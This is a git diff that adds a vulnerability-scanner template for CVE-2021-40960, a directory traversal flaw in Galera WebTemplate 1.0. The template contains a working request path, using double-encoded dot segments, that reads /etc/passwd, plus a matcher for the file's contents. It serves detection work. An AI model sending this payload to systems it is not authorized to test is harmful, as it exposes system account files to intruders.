diff --git a/cves/2021/CVE-2021-40960.yaml b/cves/2021/CVE-2021-40960.yaml new file mode 100644 index 0000000000..126dd45651 --- /dev/null +++ b/cves/2021/CVE-2021-40960.yaml @@ -0,0 +1,27 @@ +id: CVE-2021-40960 + +info: + name: Galera WebTemplate 1.0 – Directory Traversal + author: daffainfo + severity: high + description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow. + reference: + - http://www.omrylmz.com/galera-webtemplate-1-0-directory-traversal-vulnerability-cve-2021-40960/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40960 + tags: cve,cve2021,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200